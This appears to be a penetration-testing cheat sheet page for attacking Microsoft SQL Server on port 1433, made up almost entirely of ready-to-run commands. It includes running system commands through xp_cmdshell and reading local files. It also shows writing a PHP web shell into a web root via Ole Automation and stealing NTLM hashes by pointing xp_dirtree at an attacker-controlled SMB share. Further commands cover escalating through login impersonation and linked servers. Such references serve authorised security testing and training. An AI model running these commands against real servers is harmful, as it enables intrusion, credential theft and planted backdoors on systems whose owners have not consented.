MSSQl - 1433

  • MSSQL default system schemas/databases:

    • master - keeps the information for an instance of SQL Server.

    • msdb - used by SQL Server Agent.

    • model - a template database copied for each new database.

    • resource - a read-only database that keeps system objects visible in every database on the server in sys schema.

    • tempdb - keeps temporary objects for SQL queries.

Interacting with service

# Linux - SQSH
sqsh -S ip -U username -P Password123
sqsh -S ip -U .\\julio -P 'MyPassword!' -h

# Windows - SQLCMD
C:\> sqlcmd -S ip -U username -P Password123

# Useful Commands

# to list the databases
1> SELECT name FROM master.dbo.sysdatabases
2> GO

# Select a database
1> USE users
2> GO

# Show Tables
1> SELECT table_name FROM users.INFORMATION_SCHEMA.TABLES
2> GO

# Select all Data from Table "users"
1> SELECT * FROM users
2> go

# Execute Commands
1> xp_cmdshell 'whoami'
2> GO

# Read Local Files in MSSQL
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

# MSSQL - Enable Ole Automation Procedures
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# MSSQL - Create a File
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

Nmap

# NMAP MSSQL Script Scan
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 ip

Metasploit

# MSSQL Ping in Metasploit using mssql_ping auxiliary scanner
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts ip
msf6 auxiliary(scanner/mssql/mssql_ping) > run

Capture MSSQL Service Hash

# Start responder or impacket-smbserver
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support

#  XP_DIRTREE Hash Stealing
1> EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\'
2> GO

# XP_SUBDIRS Hash Stealing
1> EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\'
2> GO

Impersonate Existing Users with MSSQL

# Identify Users that We Can Impersonate
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

# Verifying our Current User and Role
# 0 means do not have sysadmin role
# 1 means we have sysadmin role
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

# Impersonating the desired User
1> EXECUTE AS LOGIN = 'User'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

Communicate with Other Databases with MSSQL

# 1 means remote server
# 0 means linked server
# Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO

# Execute Commands using EXECUTE statement
# '10.0.0.12\\SQLEXPRESS' is a linked server 
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]
2> GO

Connecting with Mssqlclient.py

# finding mssqlclient.py
locate mssqlclient.py

/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py

# To Connect to mssql server with valid creds
python3 mssqlclient.py Administrator@ip -windows-auth

# Useful Commands : <https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/>

# to list the databases
select name from sys.databases
PreviousMYSQL - 3306NextFTP - 21

Last updated